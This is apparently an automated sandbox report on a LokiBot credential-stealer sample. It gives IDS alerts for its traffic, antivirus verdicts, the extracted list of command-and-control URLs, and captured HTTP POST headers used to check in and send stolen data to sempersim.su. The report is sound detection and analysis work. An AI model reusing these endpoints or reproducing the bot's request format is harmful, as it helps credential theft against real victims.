              Timestamp:192.168.2.3104.155.55.249771802024313 06/23/22-18:08:50.748195
              SID:2024313
              Source Port:49771
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249754802025381 06/23/22-18:08:45.504366
              SID:2025381
              Source Port:49754
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249795802025381 06/23/22-18:09:20.096905
              SID:2025381
              Source Port:49795
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249858802021641 06/23/22-18:09:55.746969
              SID:2021641
              Source Port:49858
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249765802024318 06/23/22-18:08:48.152005
              SID:2024318
              Source Port:49765
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:104.155.55.2192.168.2.380497832025483 06/23/22-18:09:14.166477
              SID:2025483
              Source Port:80
              Destination Port:49783
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:104.155.55.2192.168.2.380497762025483 06/23/22-18:09:02.967256
              SID:2025483
              Source Port:80
              Destination Port:49776
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.38.8.8.850152532014169 06/23/22-18:09:17.432912
              SID:2014169
              Source Port:50152
              Destination Port:53
              Protocol:UDP
              Classtype:Potentially Bad Traffic
              Timestamp:192.168.2.3104.155.55.249776802024318 06/23/22-18:09:02.062353
              SID:2024318
              Source Port:49776
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:104.155.55.2192.168.2.380497872025483 06/23/22-18:09:18.447312
              SID:2025483
              Source Port:80
              Destination Port:49787
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249777802825766 06/23/22-18:09:04.362566
              SID:2825766
              Source Port:49777
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249743802825766 06/23/22-18:08:26.365310
              SID:2825766
              Source Port:49743
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249749802825766 06/23/22-18:08:34.891799
              SID:2825766
              Source Port:49749
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249838802825766 06/23/22-18:09:30.995615
              SID:2825766
              Source Port:49838
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:104.155.55.2192.168.2.380498582025483 06/23/22-18:09:56.667986
              SID:2025483
              Source Port:80
              Destination Port:49858
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249892802025381 06/23/22-18:10:09.603862
              SID:2025381
              Source Port:49892
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249781802021641 06/23/22-18:09:11.023804
              SID:2021641
              Source Port:49781
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:104.155.55.2192.168.2.380498922025483 06/23/22-18:10:10.533295
              SID:2025483
              Source Port:80
              Destination Port:49892
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249850802825766 06/23/22-18:09:41.932837
              SID:2825766
              Source Port:49850
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249832802825766 06/23/22-18:09:27.755282
              SID:2825766
              Source Port:49832
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249865802025381 06/23/22-18:09:59.728406
              SID:2025381
              Source Port:49865
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.38.8.8.857723532014169 06/23/22-18:08:28.453791
              SID:2014169
              Source Port:57723
              Destination Port:53
              Protocol:UDP
              Classtype:Potentially Bad Traffic
              Timestamp:192.168.2.3104.155.55.249776802025381 06/23/22-18:09:02.062353
              SID:2025381
              Source Port:49776
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:104.155.55.2192.168.2.380498562025483 06/23/22-18:09:48.532794
              SID:2025483
              Source Port:80
              Destination Port:49856
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.38.8.8.849327532014169 06/23/22-18:08:45.421000
              SID:2014169
              Source Port:49327
              Destination Port:53
              Protocol:UDP
              Classtype:Potentially Bad Traffic
              Timestamp:192.168.2.3104.155.55.249777802021641 06/23/22-18:09:04.362566
              SID:2021641
              Source Port:49777
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.38.8.8.855269532014169 06/23/22-18:10:05.798868
              SID:2014169
              Source Port:55269
              Destination Port:53
              Protocol:UDP
              Classtype:Potentially Bad Traffic
              Timestamp:192.168.2.3104.155.55.249751802024313 06/23/22-18:08:43.382677
              SID:2024313
              Source Port:49751
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249780802021641 06/23/22-18:09:08.917855
              SID:2021641
              Source Port:49780
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249751802024318 06/23/22-18:08:43.382677
              SID:2024318
              Source Port:49751
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.38.8.8.852096532014169 06/23/22-18:09:08.858532
              SID:2014169
              Source Port:52096
              Destination Port:53
              Protocol:UDP
              Classtype:Potentially Bad Traffic
              Timestamp:192.168.2.3104.155.55.249775802025381 06/23/22-18:08:59.805159
              SID:2025381
              Source Port:49775
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:104.155.55.2192.168.2.380498502025483 06/23/22-18:09:42.794326
              SID:2025483
              Source Port:80
              Destination Port:49850
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249892802825766 06/23/22-18:10:09.603862
              SID:2825766
              Source Port:49892
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249832802021641 06/23/22-18:09:27.755282
              SID:2021641
              Source Port:49832
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249867802021641 06/23/22-18:10:03.646769
              SID:2021641
              Source Port:49867
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249743802021641 06/23/22-18:08:26.365310
              SID:2021641
              Source Port:49743
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249780802825766 06/23/22-18:09:08.917855
              SID:2825766
              Source Port:49780
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249778802021641 06/23/22-18:09:06.486197
              SID:2021641
              Source Port:49778
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249879802024313 06/23/22-18:10:05.859589
              SID:2024313
              Source Port:49879
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249838802021641 06/23/22-18:09:30.995615
              SID:2021641
              Source Port:49838
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249879802024318 06/23/22-18:10:05.859589
              SID:2024318
              Source Port:49879
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249749802021641 06/23/22-18:08:34.891799
              SID:2021641
              Source Port:49749
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249778802825766 06/23/22-18:09:06.486197
              SID:2825766
              Source Port:49778
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249750802025381 06/23/22-18:08:40.626646
              SID:2025381
              Source Port:49750
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249807802021641 06/23/22-18:09:22.064496
              SID:2021641
              Source Port:49807
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.38.8.8.849775532014169 06/23/22-18:10:14.553567
              SID:2014169
              Source Port:49775
              Destination Port:53
              Protocol:UDP
              Classtype:Potentially Bad Traffic
              Timestamp:192.168.2.3104.155.55.249787802825766 06/23/22-18:09:17.520239
              SID:2825766
              Source Port:49787
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249744802025381 06/23/22-18:08:28.518392
              SID:2025381
              Source Port:49744
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249850802024313 06/23/22-18:09:41.932837
              SID:2024313
              Source Port:49850
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249850802024318 06/23/22-18:09:41.932837
              SID:2024318
              Source Port:49850
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249867802825766 06/23/22-18:10:03.646769
              SID:2825766
              Source Port:49867
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249842802025381 06/23/22-18:09:36.768062
              SID:2025381
              Source Port:49842
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249745802024313 06/23/22-18:08:30.578499
              SID:2024313
              Source Port:49745
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp                 SID      Source             Destination        Protocol  Classtype
              06/23/22-18:09:13.286095  2024313  192.168.2.3:49783  104.155.55.2:80    TCP       A Network Trojan was detected
              06/23/22-18:08:48.152005  2825766  192.168.2.3:49765  104.155.55.2:80    TCP       A Network Trojan was detected
              06/23/22-18:10:16.412962  2025381  192.168.2.3:49896  104.155.55.2:80    TCP       A Network Trojan was detected
              06/23/22-18:09:13.286095  2024318  192.168.2.3:49783  104.155.55.2:80    TCP       A Network Trojan was detected
              06/23/22-18:09:04.362566  2024318  192.168.2.3:49777  104.155.55.2:80    TCP       A Network Trojan was detected
              06/23/22-18:09:37.680341  2025483  104.155.55.2:80    192.168.2.3:49842  TCP       A Network Trojan was detected
              06/23/22-18:10:14.615169  2021641  192.168.2.3:49895  104.155.55.2:80    TCP       A Network Trojan was detected
              06/23/22-18:10:14.615169  2825766  192.168.2.3:49895  104.155.55.2:80    TCP       A Network Trojan was detected
              06/23/22-18:08:53.475797  2025381  192.168.2.3:49772  104.155.55.2:80    TCP       A Network Trojan was detected
              06/23/22-18:08:50.748195  2021641  192.168.2.3:49771  104.155.55.2:80    TCP       A Network Trojan was detected
              06/23/22-18:08:50.748195  2825766  192.168.2.3:49771  104.155.55.2:80    TCP       A Network Trojan was detected
              06/23/22-18:09:22.064496  2825766  192.168.2.3:49807  104.155.55.2:80    TCP       A Network Trojan was detected
              06/23/22-18:08:32.826506  2021641  192.168.2.3:49746  104.155.55.2:80    TCP       A Network Trojan was detected
              06/23/22-18:09:17.520239  2021641  192.168.2.3:49787  104.155.55.2:80    TCP       A Network Trojan was detected

              AV Detection

              Source: http://sempersim.su/gh20/fre.php | Avira URL Cloud: Label: malware
              Source: sempersim.su | Virustotal: Detection: 26%
              Source: http://sempersim.su/gh20/fre.php | Virustotal: Detection: 22%
              Source: hfyhigXccT.exe | Joe Sandbox ML: detected
              Source: 00000000.00000002.280075598.00000000031F8000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://sempersim.su/gh20/fre.php"]}
              Source: hfyhigXccT.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: hfyhigXccT.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

              Networking

              Source: Traffic | Snort IDS: the alerts below fired on 34 HTTP flows from 192.168.2.3 to 104.155.55.2:80. For every TCP flow the report lists, immediately before it, one DNS query 192.168.2.3:<DNS src port> -> 8.8.8.8:53 matching 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related. Two rule sets occur:

              Rule set A (credential exfiltration, client -> server):
                2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1
                2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno)
                2025381 ET TROJAN LokiBot Checkin
                2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2
                2825766 ETPRO TROJAN LokiBot Checkin M2

              Rule set B (C2 command poll, client -> server, plus the server's reply):
                2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1
                2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno)
                2025381 ET TROJAN LokiBot Checkin
                2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2
                2825766 ETPRO TROJAN LokiBot Checkin M2
                2025483 ET TROJAN LokiBot Fake 404 Response (104.155.55.2:80 -> 192.168.2.3:<TCP src port>)

              DNS src port  TCP flow (-> 104.155.55.2:80)  Rule set
              55923         192.168.2.3:49743              A
              57723         192.168.2.3:49744              A
              58116         192.168.2.3:49745              B
              57421         192.168.2.3:49746              B
              49873         192.168.2.3:49749              B
              53802         192.168.2.3:49750              B
              65266         192.168.2.3:49751              B
              49327         192.168.2.3:49754              B
              64452         192.168.2.3:49765              B
              58625         192.168.2.3:49771              B
              52810         192.168.2.3:49772              B
              50778         192.168.2.3:49773              B
              59795         192.168.2.3:49775              B
              59390         192.168.2.3:49776              B
              64816         192.168.2.3:49777              B
              64996         192.168.2.3:49778              B
              52096         192.168.2.3:49780              B
              60640         192.168.2.3:49781              B
              63861         192.168.2.3:49783              B
              50152         192.168.2.3:49787              B
              62724         192.168.2.3:49795              B
              64412         192.168.2.3:49807              B
              62547         192.168.2.3:49832              B
              57442         192.168.2.3:49838              B
              52487         192.168.2.3:49842              B
              58950         192.168.2.3:49850              B
              59065         192.168.2.3:49856              B
              64589         192.168.2.3:49858              B
              55795         192.168.2.3:49865              B
              64635         192.168.2.3:49867              B
              55269         192.168.2.3:49879              B
              63083         192.168.2.3:49892              B
              49775         192.168.2.3:49895              B
              60195         192.168.2.3:49896              B
Source: Yara match | File source: 0.2.hfyhigXccT.exe.32002d8.4.raw.unpack, type: UNPACKEDPE
Source: Malware configuration extractor | URLs: http://kbfvzoboss.bid/alien/fre.php
Source: Malware configuration extractor | URLs: http://alphastand.trade/alien/fre.php
Source: Malware configuration extractor | URLs: http://alphastand.win/alien/fre.php
Source: Malware configuration extractor | URLs: http://alphastand.top/alien/fre.php
Source: Malware configuration extractor | URLs: http://sempersim.su/gh20/fre.php
Source: global traffic | HTTP traffic detected: POST /gh20/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: sempersim.su | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: 306A36E8 | Content-Length: 190 | Connection: close (2 identical requests observed)
Source: global traffic | HTTP traffic detected: POST /gh20/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: sempersim.su | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: 306A36E8 | Content-Length: 163 | Connection: close (32 identical requests observed)
Source: hfyhigXccT.exe, 00000000.00000003.250750964.0000000005F86000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://en.w=
Source: hfyhigXccT.exe, 00000000.00000002.282435363.0000000007192000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://fontfabrik.com
Source: hfyhigXccT.exe, 00000005.00000002.519179407.000000000049F000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://sempersim.su/gh20/fre.php
Source: hfyhigXccT.exe, 00000000.00000002.282435363.0000000007192000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: hfyhigXccT.exe, 00000000.00000002.282435363.0000000007192000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: hfyhigXccT.exe, 00000000.00000003.259973400.0000000005F88000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.259728044.0000000005F87000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000002.282435363.0000000007192000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: hfyhigXccT.exe, 00000000.00000002.282435363.0000000007192000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: hfyhigXccT.exe, 00000000.00000002.282435363.0000000007192000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: hfyhigXccT.exe, 00000000.00000002.282435363.0000000007192000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: hfyhigXccT.exe, 00000000.00000002.282435363.0000000007192000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: hfyhigXccT.exe, 00000000.00000002.282435363.0000000007192000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: hfyhigXccT.exe, 00000000.00000002.282435363.0000000007192000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: hfyhigXccT.exe, 00000000.00000002.282435363.0000000007192000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: hfyhigXccT.exe, 00000000.00000003.259973400.0000000005F88000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.259728044.0000000005F87000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.comF
Source: hfyhigXccT.exe, 00000000.00000003.264877441.0000000005F8A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.comM
Source: hfyhigXccT.exe, 00000000.00000003.259973400.0000000005F88000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.259728044.0000000005F87000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.comituo_
Source: hfyhigXccT.exe, 00000000.00000003.264877441.0000000005F8A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.comm
Source: hfyhigXccT.exe, 00000000.00000003.259973400.0000000005F88000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.259728044.0000000005F87000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.comrsivb
Source: hfyhigXccT.exe, 00000000.00000003.259973400.0000000005F88000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.259728044.0000000005F87000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.comtto9
Source: hfyhigXccT.exe, 00000000.00000002.282435363.0000000007192000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fonts.com
Source: hfyhigXccT.exe, 00000000.00000003.252891597.0000000005F87000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.253123438.0000000005F87000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000002.282435363.0000000007192000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.253038446.0000000005F88000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: hfyhigXccT.exe, 00000000.00000002.282435363.0000000007192000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: hfyhigXccT.exe, 00000000.00000002.282435363.0000000007192000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: hfyhigXccT.exe, 00000000.00000003.253038446.0000000005F88000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cnscr
Source: hfyhigXccT.exe, 00000000.00000003.261371262.0000000005FB0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.galapagosdesign.com/
Source: hfyhigXccT.exe, 00000000.00000003.261478813.0000000005FB0000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.261600713.0000000005FB0000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.261371262.0000000005FB0000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.261532870.0000000005FB0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.galapagosdesign.com/9q
Source: hfyhigXccT.exe, 00000000.00000002.282435363.0000000007192000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: hfyhigXccT.exe, 00000000.00000002.282435363.0000000007192000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: hfyhigXccT.exe, 00000000.00000002.282435363.0000000007192000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: hfyhigXccT.exe, 00000000.00000002.280075598.00000000031F8000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000002.281633954.000000000435F000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000002.281705492.0000000004395000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000005.00000000.276578950.0000000000400000.00000040.00000400.00020000.00000000.sdmp, hfyhigXccT.exe, 00000005.00000002.519105745.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://www.ibsensoftware.com/
Source: hfyhigXccT.exe, 00000000.00000003.255574600.0000000005F8B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: hfyhigXccT.exe, 00000000.00000003.255439447.0000000005F8B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.255574600.0000000005F8B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/%
Source: hfyhigXccT.exe, 00000000.00000003.255439447.0000000005F8B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.255574600.0000000005F8B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/7
Source: hfyhigXccT.exe, 00000000.00000003.255439447.0000000005F8B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.255574600.0000000005F8B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/M
Source: hfyhigXccT.exe, 00000000.00000003.255439447.0000000005F8B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.255574600.0000000005F8B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/Y0
Source: hfyhigXccT.exe, 00000000.00000003.255574600.0000000005F8B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/_
Source: hfyhigXccT.exe, 00000000.00000003.255439447.0000000005F8B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.255574600.0000000005F8B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/i
Source: hfyhigXccT.exe, 00000000.00000003.255439447.0000000005F8B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.255574600.0000000005F8B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
Source: hfyhigXccT.exe, 00000000.00000003.251224303.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.251819251.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.253424374.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.251109332.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.254256494.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.251803357.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.254662852.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.252067592.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.254588808.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.250764720.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.251698910.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.254981466.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.251899560.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.252697276.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.250696385.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.251587341.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.254920230.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.251361011.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.251927308.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.252012786.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.250643837.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: hfyhigXccT.exe, 00000000.00000003.251224303.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.251819251.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.253424374.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.251109332.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.254256494.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.251803357.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.254662852.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.252067592.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.254588808.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.250764720.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.251698910.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.254981466.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.251899560.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.252697276.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.250696385.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.251587341.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.254920230.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.251361011.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.251927308.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.252012786.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.250643837.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sajatypeworks.com2
